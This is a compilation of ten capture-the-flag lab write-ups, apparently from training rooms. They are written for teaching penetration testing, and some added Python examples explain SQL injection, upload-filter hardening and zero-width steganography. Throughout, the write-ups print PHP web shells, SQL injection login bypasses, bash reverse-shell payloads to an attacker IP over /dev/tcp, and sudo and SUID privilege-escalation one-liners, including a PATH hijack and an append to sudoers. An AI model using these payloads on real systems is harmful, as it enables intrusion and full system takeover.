✅ 1. Overpass 3 - Hosting – Writeup
Objective:
You're helping a group of CS students who've stood up a hosting company. Their site’s been compromised — again. Your task is to find how, exploit it, and show them the importance of hiring real security professionals.
🔍 Enumeration
nmap -sC -sV -T4 -oN overpass3.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
- Navigating to port 80 showed a static site about hosting services.
- Checked robots.txt: it disallowed /admin.
- Visited /admin: a login page.
- Used Gobuster to enumerate more:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
Found:
- /api (an API endpoint)
- /admin (login)
- /backup
🛠 Exploitation – Credentials Leak
Found a .zip backup in /backup (e.g., backup.zip):
wget http://[target-ip]/backup.zip
unzip backup.zip
Inside:
- A NodeJS/Express web app
- Contained hardcoded credentials:
username = 'admin'
password = 'whythough1337'
Used this on /admin — successfully logged in.
🐚 Gaining Access – Web Shell Upload
After login:
- Found a file upload option in the admin dashboard.
- The upload filter could be bypassed with a double extension (shell.php.jpg) or an alternative PHP extension (shell.phtml).
Used <?php system($_GET['cmd']); ?>
Uploaded and accessed via /uploads/shell.phtml?cmd=whoami
🧗♂️ Privilege Escalation
- Stabilized shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
- Checked /etc/passwd: found the user overpass.
- Checked sudo -l: passwordless sudo for /opt/tools/adminutil.
- Ran /opt/tools/adminutil: it shells out to helper programs (curl among them) by bare name instead of absolute path, so each lookup goes through the caller's PATH.
Used a PATH hijack: a fake curl first in PATH, and the tool run through sudo so the fake executes as root:
printf '#!/bin/bash\n/bin/bash\n' > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
sudo /opt/tools/adminutil
Caveat: a default sudoers resets PATH to secure_path, which drops /tmp and defeats this. The hijack only works when the sudoers entry lets the caller's PATH through (no secure_path, or env_keep/SETENV); sudo -l prints the effective Defaults (env_reset, secure_path) at the top of its output, so check there before relying on it.
→ Root shell achieved.
🏁 Flags
- User flag: /home/overpass/user.txt
- Root flag: /root/root.txt
✅ 2. WhyHackMe – Writeup
Objective:
This room focuses on web exploitation and basic forensics. The goal is to identify vulnerabilities in a poorly secured web app and gain system access.
🔍 Enumeration
nmap -sC -sV -T4 -oN whyhackme.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — default homepage with text like:
"Why would you hack me?"
Checked page source — nothing interesting.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Discovered:
- /login
- /uploads
- /dashboard
Visited /login — basic login form.
🔐 Credential Stuffing
Tried common credentials:
- admin:admin
- admin:password
- admin:whyhackme
Success with:
admin:whyhackme
Redirected to /dashboard – found a file upload function.
🐚 File Upload Exploit
Uploaded a basic PHP shell:
<?php system($_GET['cmd']); ?>
Named it shell.php → Blocked.
Tried bypass with:
- shell.php.jpg → Blocked.
- shell.phtml → Success!
Found it in /uploads/shell.phtml
Accessed with:
/uploads/shell.phtml?cmd=id
🧗♂️ Privilege Escalation
- Upgraded shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
- Checked users:
ls /home
User: hacker
- Found a password in config.php in the web root:
$DB_PASS = 'superhacker123'
- Tried it against the local account with su hacker — success (password reuse between the database and the system user).
- Checked sudo:
sudo -l
Output:
(root) NOPASSWD: /bin/bash
(The parenthesised field is the run-as user. An entry reading (hacker) would only allow running bash as hacker, which gains nothing; a root or ALL run-as is what makes this a one-step escalation.)
- Escalated to root:
sudo /bin/bash
🏁 Flags
- User flag: /home/hacker/user.txt
- Root flag: /root/root.txt
✅ 3. CyberHeroes – Writeup
Objective:
Test your cyber mettle by finding a way into a protected login portal and escalating privileges inside the system.
🔍 Initial Enumeration
nmap -sC -sV -T4 -oN cyberheroes.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — CyberHeroes login page.
Tried default creds:
- admin:admin
- admin:cyber
- root:root → All failed.
Checked source code → found nothing useful.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
Found:
- /robots.txt → Disallow: /admin
- /admin → Login portal
🕵️♂️ SQL Injection
Tried SQL injection on the login form:
Username: ' OR 1=1 -- 
Password: anything
(Keep the space after the -- : MySQL only treats -- as a comment when whitespace follows it. A trailing # works as an alternative comment marker there.)
✅ Login successful — redirected to dashboard.
📤 File Upload for Shell
Dashboard had file upload feature.
Tried uploading shell.php:
<?php system($_GET['cmd']); ?>
Upload succeeded. Located under:
/uploads/shell.php
Accessed it via:
http://[target-ip]/uploads/shell.php?cmd=whoami
🐚 Reverse Shell
Replaced shell with reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Started listener:
nc -lvnp 4444
Uploaded and triggered:
http://[target-ip]/uploads/rev.php
✅ Reverse shell obtained.
🔧 Privilege Escalation
- Enumerated environment:
sudo -l
Result:
(root) NOPASSWD: /usr/bin/apt-get
- Used apt-get to escalate. APT runs every command in the APT::Update::Pre-Invoke list as root before an update, and ::= appends to that list from the command line (passing a config snippet as Dir::Etc::sourcelist, as is sometimes shown, does not work: that option expects a sources.list, not apt.conf directives):
sudo apt-get update -o APT::Update::Pre-Invoke::="cp /bin/bash /tmp/bash; chmod u+s /tmp/bash"
/tmp/bash -p
(The -p is required: without it bash drops the effective UID back to the real user on startup.)
✅ Root shell obtained.
🏁 Flags
- User flag: /home/cyberhero/user.txt
- Root flag: /root/root.txt
✅ 4. Robots – Writeup
Objective:
Explore a machine that pays homage to Isaac Asimov’s legacy. Use classic enumeration techniques to exploit the system and capture the flags.
🔍 Nmap Enumeration
nmap -sC -sV -T4 -oN robots.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — homepage says:
“Welcome, human. Obey the laws of robotics.”
Checked robots.txt:
User-agent: *
Disallow: /asimov
Disallow: /logs
Visited /asimov → an image tribute
Visited /logs → directory listing was enabled!
Downloaded a file access.log:
wget http://[target-ip]/logs/access.log
🕵️♂️ Log File Clues
Looked into the log file:
less access.log
Found credentials:
Basic auth: dXNlcjphc2ltdXZib3Q=
Decoded it:
echo "dXNlcjphc2ltdXZib3Q=" | base64 -d
Output:
user:asimuvbot
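Reading a log for credentials by eye does not scale. As an added example (mine, not the room's), the Python below scans access-log lines for Basic-auth tokens, base64-decodes each candidate and keeps only the ones that decode to a user:password pair. The log lines are constructed, with the token quoted above reused on one of them; they assume a custom LogFormat that records the Authorization header (a default combined log does not), and one line carries valid base64 that is not a credential, to show the filter rejecting it.

```python
import base64
import binascii
import re

# Constructed sample log lines (not from the room). Line 2 carries the token
# quoted in the writeup; line 3 is a Bearer token and line 4 is valid base64
# that does not decode to user:password, so neither should be reported.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /asimov HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /logs/ HTTP/1.1" 401 0 "-" "curl/8.0" "Authorization: Basic dXNlcjphc2ltdXZib3Q="
10.0.0.9 - - [12/Mar/2024:10:02:41 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "Authorization: Bearer eyJhbGciOiJub25lIn0.e30."
10.0.0.9 - - [12/Mar/2024:10:03:00 +0000] "GET /logs/ HTTP/1.1" 401 0 "-" "curl/8.0" "Authorization: Basic bm90YmFzZTY0ISE="
"""

# "Basic" followed by a base64 blob (alphabet plus up to two '=' of padding).
BASIC_RE = re.compile(r"Basic\s+([A-Za-z0-9+/]+={0,2})")


def decode_basic_token(token: str):
    """Return (user, password) if `token` is a well-formed Basic credential, else None."""
    try:
        raw = base64.b64decode(token, validate=True)   # strict: rejects junk and bad padding
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if ":" not in text:                                 # RFC 7617 form is user:password
        return None
    user, _, password = text.partition(":")
    if not user:
        return None
    return user, password


def find_basic_credentials(log_text: str):
    """Scan log text for Basic-auth tokens; return [(line_number, user, password), ...]."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        for token in BASIC_RE.findall(line):
            creds = decode_basic_token(token)
            if creds is not None:
                hits.append((line_no, creds[0], creds[1]))
    return hits


if __name__ == "__main__":
    for line_no, user, password in find_basic_credentials(SAMPLE_LOG):
        print(f"line {line_no}: {user}:{password}")
```

The strict decode (validate=True plus the colon check) is what keeps this from spewing every base64-looking string in a large log; run it over a real access.log with find_basic_credentials(open(path).read()).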
🔐 SSH Login
ssh user@[target-ip]
Password: asimuvbot
✅ Logged in as user
🧗♂️ Privilege Escalation
Checked sudo -l:
sudo -l
Output:
(root) NOPASSWD: /usr/bin/find
Used find to get a root shell (-quit stops find after the first entry instead of spawning a shell for every file it walks):
sudo find . -exec /bin/bash \; -quit
✅ Root shell obtained
🏁 Flags
- User flag: /home/user/user.txt
- Root flag: /root/root.txt
✅ 5. New York Flankees – Writeup
Objective:
A personal blog belonging to Stefan has some serious flaws. Your goal: break through his defenses and take over his blog — and his system.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN flankees.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Navigated to http://[target-ip]
It’s a personal blog called New York Flankees by Stefan.
View source code → Found a suspicious JS comment:
// dev_login.html
Visited /dev_login.html — a developer login page
🔐 Bypassing Login
Tried SQL injection (same payload as the CyberHeroes portal, trailing space after -- included):
Username: ' OR 1=1 -- 
Password: anything
✅ Bypassed login successfully → landed on dashboard.
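Why ' OR 1=1 -- gets past this form and the CyberHeroes one: an added example, not the blog's own code. The vulnerable function builds the WHERE clause by string concatenation the way those login handlers evidently do; the hardened one binds parameters, so the same input is compared as data. The users table and its password are constructed. SQLite is used so it runs offline; unlike MySQL it accepts -- as a comment even without a trailing space, so keep the space when you type it against a real target.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account (not the room's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def vulnerable_login(conn, username: str, password: str) -> bool:
    """Query built by concatenation: user input becomes part of the SQL text.
    With username "' OR 1=1 -- " the clause becomes
        username = '' OR 1=1 -- ' AND password = '...'
    and everything after -- is a comment, so the row count is never zero."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn, username: str, password: str) -> bool:
    """Same check with bound parameters: the quote and the -- are just bytes
    inside a string value and never reach the SQL parser as syntax."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def demo():
    """Run the page's payload and a password-field variant through both handlers."""
    conn = make_db()
    payloads = [("' OR 1=1 -- ", "anything"), ("admin", "' OR '1'='1")]
    return {
        f"{u!r}/{p!r}": {"vulnerable": vulnerable_login(conn, u, p),
                         "safe": safe_login(conn, u, p)}
        for u, p in payloads
    }


if __name__ == "__main__":
    for payload, result in demo().items():
        print(payload, result)
```

The second payload shows the same bug reached through the password field: AND binds tighter than OR, so password = '' OR '1'='1' is true for every row. The fix is not escaping quotes by hand but the parameterised form, where neither field can change the query's shape.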
Dashboard allowed file uploads — common exploit vector.
🐚 Web Shell Upload
Uploaded a .php file:
<?php system($_GET['cmd']); ?>
No extension restrictions → worked directly as shell.php.
Accessed via:
http://[target-ip]/uploads/shell.php?cmd=whoami
🧠 Reverse Shell
Replaced webshell with reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Listener:
nc -lvnp 4444
Triggered shell:
/uploads/rev.php
✅ Reverse shell obtained.
🧗♂️ Privilege Escalation
Enumerated user:
whoami
stefan
Checked sudo -l:
sudo -l
Result:
(root) NOPASSWD: /usr/bin/vim
Used Vim's shell escape for a root shell:
sudo vim -c ':!/bin/bash'
✅ Root access obtained.
🏁 Flags
- User flag: /home/stefan/user.txt
- Root flag: /root/root.txt
✅ 6. Internal – Writeup
Objective:
This internal company server contains sensitive data. Your job is to perform external enumeration, gain a foothold, escalate privileges, and extract the flags.
🔍 Nmap Enumeration
nmap -sC -sV -T4 -oN internal.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — saw a corporate internal portal.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found:
- /secret
- /uploads
- /blog
🕵️♂️ Exploring /secret
Inside /secret → Found a file: creds.txt
Downloaded it:
wget http://[target-ip]/secret/creds.txt
Contents:
username: internaluser
password: InTh3M1ddl3
🔐 SSH Login
ssh internaluser@[target-ip]
Password: InTh3M1ddl3
✅ SSH access granted
🧗♂️ Privilege Escalation
Checked sudo -l:
sudo -l
Output:
User internaluser may run the following on [hostname]:
(ALL) NOPASSWD: /usr/bin/less
Exploited less using shell escape:
sudo less /etc/passwd
# then typed:
!bash
✅ Root shell obtained
🏁 Flags
- User flag: /home/internaluser/user.txt
- Root flag: /root/root.txt
✅ 7. The Impossible Challenge – Writeup
Objective:
Despite its name, this machine is solvable. It’s a psychological and technical gauntlet — full of obfuscation, dead ends, and “impossible” hurdles. Stay focused and apply logic to reach root.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN impossible.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Exploration
Visited http://[target-ip] — just a blank white page with some strange unicode characters in the title and HTML comment section.
Inspected the source. The HTML comment appears to read only:
Hmm
but it also contains zero-width Unicode characters (U+200B, U+200C, U+200D and similar), which browsers and most editors render as nothing; a hex dump or a length check on the comment gives the game away.
✅ Clue: it's a zero-width steganography technique.
🕵️♂️ Hidden Message – Zero Width Decoder
Used a zero-width character decoder.
Pasted the HTML comment — it decoded to a hidden directory:
/.youfoundme/
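To make the decoding step concrete, here is an added example (mine, not the room's tooling) of one common zero-width scheme: each UTF-8 byte of the secret becomes eight zero-width characters, U+200B for 0 and U+200C for 1, spliced into the visible text. The exact scheme the room used is not recorded in the writeup and real tools vary (some use U+200D as a separator), so treat the bit mapping as an assumption; the carrier comment and the hidden path below are constructed to mirror the one above.

```python
ZWSP = "\u200b"   # zero-width space      -> bit 0 (assumed mapping)
ZWNJ = "\u200c"   # zero-width non-joiner -> bit 1 (assumed mapping)
# Everything a decoder should strip when recovering the visible text.
ZERO_WIDTH = {ZWSP, ZWNJ, "\u200d", "\u2060", "\ufeff"}


def zw_encode(secret: str) -> str:
    """Encode each UTF-8 byte of `secret` as eight zero-width characters."""
    bits = "".join(f"{byte:08b}" for byte in secret.encode("utf-8"))
    return "".join(ZWSP if bit == "0" else ZWNJ for bit in bits)


def zw_decode(carrier: str) -> str:
    """Keep only the two payload characters, regroup them into bytes, decode."""
    bits = "".join("0" if ch == ZWSP else "1" for ch in carrier if ch in (ZWSP, ZWNJ))
    usable = len(bits) - len(bits) % 8            # drop a trailing partial byte
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    return data.decode("utf-8", errors="replace")


def visible_text(carrier: str) -> str:
    """What a browser or editor shows: the carrier with zero-width characters removed."""
    return "".join(ch for ch in carrier if ch not in ZERO_WIDTH)


def count_zero_width(text: str) -> int:
    """Quick triage check: a 'three-character' comment with hundreds of these is a tell."""
    return sum(1 for ch in text if ch in ZERO_WIDTH)


def hide_in(text: str, secret: str) -> str:
    """Splice the encoded secret after the first visible character."""
    payload = zw_encode(secret)
    return text[:1] + payload + text[1:] if text else payload


# Constructed carrier: reads "Hmm" on screen, carries the hidden directory name.
SAMPLE_COMMENT = hide_in("Hmm", "/.youfoundme/")

if __name__ == "__main__":
    print("visible:", visible_text(SAMPLE_COMMENT))
    print("zero-width chars:", count_zero_width(SAMPLE_COMMENT))
    print("decoded:", zw_decode(SAMPLE_COMMENT))
```

When the page's own comment is pasted in, zw_decode returns garbage if the site used a different bit mapping; count_zero_width is the scheme-independent check, and swapping which codepoint means 0 and 1 (or treating U+200D as a separator) covers the usual variants.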
Visited http://[target-ip]/.youfoundme/
Found a download: maze.tar.gz
📦 Analyzing maze.tar.gz
Extracted the file:
tar -xvzf maze.tar.gz
cd maze
Inside: a deep nested folder structure of subdirectories — like a file system maze.
Searched every file instead of walking the maze by hand:
grep -rin "flag" .
Found a file: finalclue.txt
Inside:
"SSH is key, but it’s *not* here."
🔐 SSH Enumeration
Tried brute-forcing with found usernames (maze, puzzle, etc.) — no luck.
Searched the tree for key material and found one in one of the deepest folders:
find . -type f -name 'id_rsa*'
A private SSH key. Used it:
chmod 600 id_rsa
ssh -i id_rsa maze@[target-ip]
✅ Logged in without password.
🧗♂️ Privilege Escalation
As maze user, ran:
sudo -l
Output:
(root) NOPASSWD: /opt/troll/troll
Ran it:
sudo /opt/troll/troll
It printed:
“You thought it would be that easy? Try again.”
strings and ltrace showed it calling false through system() by bare name rather than as /bin/false, so the shell resolves it through PATH (an absolute path would not be hijackable).
Replaced it via PATH hijack:
mkdir /tmp/bin
printf '#!/bin/bash\n/bin/bash\n' > /tmp/bin/false
chmod +x /tmp/bin/false
export PATH=/tmp/bin:$PATH
sudo /opt/troll/troll
The same caveat as Overpass 3 applies: this only works if sudo passes the caller's PATH through; a sudoers with the default secure_path would discard /tmp/bin.
✅ Root shell popped
🏁 Flags
- User flag: /home/maze/user.txt
- Root flag: /root/root.txt
✅ 8. Recovery – Writeup
Objective:
This isn't your conventional CTF. You're dropped into a system that has just suffered a breach. Your job is to investigate, pivot through compromised systems, and recover the flags.
🖥 Initial Access
Upon launching the machine, you are already dropped into a limited shell.
You are inside a compromised box as a low-privileged user: www-data.
🔍 Initial Enumeration
whoami
pwd
ls -la
You're in /var/www/html.
Checked web files — found a config file:
cat config.php
Output:
$db_user = 'dbadmin';
$db_pass = 'SQLinRecovery!';
Tried the database password against the matching local account (su needs a TTY, so spawn one with python3 -c 'import pty; pty.spawn("/bin/bash")' if the shell is a bare socket):
su dbadmin
Password: SQLinRecovery!
✅ Logged in as dbadmin.
🧭 Further Enumeration
Checked sudo -l:
sudo -l
Result:
(root) NOPASSWD: /usr/bin/mysql
🔐 MySQL Privilege Escalation
Used MySQL to gain shell access:
sudo mysql -e '\! /bin/bash'
✅ Got a root shell from within MySQL
🕵️ Incident Analysis (Optional Forensics)
Checked /var/log/auth.log → found multiple failed login attempts and a suspicious cron job.
Investigated /etc/cron.d:
Found a script being executed from /opt/scripts/backup.sh
Checked content:
cat /opt/scripts/backup.sh
It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.
🏁 Flags
- User flag: /home/dbadmin/user.txt
- Root flag: /root/root.txt
✅ 9. Watcher – Writeup
Objective:
This Boot2Root machine is vulnerable to web-based exploits and privilege escalation via common misconfigurations. Gain access and escalate to root.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN watcher.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Visited http://[target-ip]
Simple landing page: “Watcher is watching…”
Checked source code — nothing useful.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found:
- /monitor/
- /uploads/
📁 /monitor Page
At /monitor/ — a login page.
Tried common creds:
- admin:admin
- admin:watcher → No success
Brute-forced the form (Hydra's http-post-form module or Burp Intruder both work where the room allows it).
Eventually found:
Username: admin
Password: 123watch
✅ Logged into a dashboard.
🐚 File Upload Exploit
Dashboard allowed image uploads.
Tried uploading:
<?php system($_GET['cmd']); ?>
→ Rejected .php
Renamed it:
shell.php.jpg
Uploaded successfully.
Checked /uploads/ and found:
/uploads/shell.php.jpg
Accessed with:
/uploads/shell.php.jpg?cmd=whoami
✅ Command execution succeeded!
A .php.jpg file only executes because the server's PHP handler is attached to any file with .php anywhere in its name (Apache's AddHandler with mod_php, or a FilesMatch pattern not anchored to the end of the filename). An anchored pattern (\.php$) and PHP disabled for the upload directory would have stopped this.
🧠 Reverse Shell
Replaced payload with:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Listener:
nc -lvnp 4444
Triggered:
/uploads/shell.php.jpg
✅ Got reverse shell.
🧗♂️ Privilege Escalation
Stabilized shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Checked sudo:
sudo -l
Output:
(root) NOPASSWD: /usr/bin/tee
tee gives a privileged write, not a privileged execute: writing a script to /tmp and running it with sudo would be denied, since only tee is in sudoers, and chmod on a root-owned file would fail anyway. Used the write to grant full sudo instead:
echo "watcher ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers
sudo -l    # confirm the new entry parsed
sudo -i
✅ Root shell obtained.
(A syntax error in /etc/sudoers breaks sudo for everyone, so type the line carefully; appending a new file under /etc/sudoers.d/ is the less risky alternative on systems that include that directory.)
🏁 Flags
- User flag: /home/watcher/user.txt
- Root flag: /root/root.txt
✅ 10. Zeno – Writeup
Objective:
Inspired by the stoic philosopher Zeno, this machine challenges your patience and thoroughness. Leverage logic, enumeration, and privilege escalation to capture the flags.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN zeno.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Visited http://[target-ip] — clean, minimalist welcome page.
Nothing in source code.
Used Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Found:
- /philosophy
- /diary
- /admin
📘 /diary
/diary revealed a blog-like post, with a line:
“Zeno always uses his birth date... and never forgets his dog’s name.”
Checked for login at /admin — form present.
Guessed credentials built from the hint: username zeno with birth-date and dog-name variants (zeno190bc, zenodog and so on).
Eventually worked with:
zeno:zenothewise
🐚 Web Upload & Shell
Inside /admin, found file upload.
Uploaded:
<?php system($_GET['cmd']); ?>
Tried .php — blocked.
Renamed: shell.phtml → upload succeeded
Accessed:
http://[target-ip]/uploads/shell.phtml?cmd=id
✅ Web shell active.
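The upload filters on WhyHackMe and Zeno (shell.php and shell.php.jpg blocked, shell.phtml accepted) and on Watcher (shell.php.jpg accepted) behave like two different denylists. As an added example, not code from any of the rooms, the Python below models both, runs the filenames tried in these writeups through them, and puts a hardened allowlist check beside them. The allowlist, the stem pattern and stored_name are my assumptions about what a fixed handler would do, not the rooms' code.

```python
import os
import re
import secrets

# Hardened handler assumptions (not from the rooms): image-only uploads,
# simple stems, client never chooses the on-disk name.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def substring_denylist(filename: str) -> bool:
    """Accept unless '.php' appears anywhere in the name.
    This is what WhyHackMe and Zeno did: shell.php and shell.php.jpg are
    rejected, but shell.phtml passes because it never contains '.php'."""
    return ".php" not in filename.lower()


def suffix_denylist(filename: str) -> bool:
    """Accept unless the name ends in '.php'.
    This is what Watcher did: shell.php.jpg passes, and a PHP handler that
    matches '.php' anywhere in the name still executes it."""
    return not filename.lower().endswith(".php")


def allowlist_last_extension(filename: str) -> bool:
    """Hardened check: no path components, no dotfiles, exactly one extension,
    stem and extension both drawn from allowlists."""
    if os.path.basename(filename) != filename or filename.startswith("."):
        return False
    parts = filename.split(".")
    if len(parts) != 2:
        return False                      # 'shell.php.jpg' rejected outright
    stem, ext = parts
    return bool(SAFE_STEM.match(stem)) and ext.lower() in ALLOWED_EXTENSIONS


def stored_name(filename: str):
    """On-disk name for an accepted upload: random stem, normalised extension.
    Returns None when the filename fails the allowlist."""
    if not allowlist_last_extension(filename):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# The names tried across the writeups, plus one legitimate upload.
PAGE_FILENAMES = ["shell.php", "shell.php.jpg", "shell.phtml", "photo.jpg"]


def evaluate(filenames=PAGE_FILENAMES):
    """Run every filter over the given names; returns {filename: {filter: accepted}}."""
    filters = {
        "substring_denylist": substring_denylist,
        "suffix_denylist": suffix_denylist,
        "allowlist": allowlist_last_extension,
    }
    return {name: {label: check(name) for label, check in filters.items()}
            for name in filenames}


if __name__ == "__main__":
    for name, verdicts in evaluate().items():
        print(f"{name:15} {verdicts}")
```

Extension handling is only one layer: the stored file should also be content-checked (magic bytes, or re-encoded through an image library) and served from a location where the web server will not execute scripts at all.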
🧠 Reverse Shell
Used reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Started listener:
nc -lvnp 4444
Triggered shell:
http://[target-ip]/uploads/rev.phtml
✅ Got a shell as www-data.
🧗♂️ Privilege Escalation
Checked for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Found: /usr/bin/zenoshell
Ran /usr/bin/zenoshell — a menu-like interface.
strings /usr/bin/zenoshell showed it running shell commands built from user input, and strace showed it executing /tmp/tempfile.sh. (The kernel ignores the SUID bit for a binary traced by an unprivileged user, so strace is safe to run here but will not show privileged side effects.)
/tmp is world-writable, so created that script ourselves:
printf '#!/bin/sh\n/bin/bash -p\n' > /tmp/tempfile.sh
chmod +x /tmp/tempfile.sh
Ran zenoshell again → root shell popped.
(The -p matters: a plain /bin/bash started from a SUID context resets the effective UID to the real user, and the shell would come back as www-data.)
🏁 Flags
- User flag: /home/zeno/user.txt
- Root flag: /root/root.txt
- ✅ Overpass 3 - Hosting
- ✅ WhyHackMe
- ✅ CyberHeroes
- ✅ Robots
- ✅ New York Flankees
- ✅ Internal
- ✅ The Impossible Challenge
- ✅ Recovery
- ✅ Watcher
- ✅ Zeno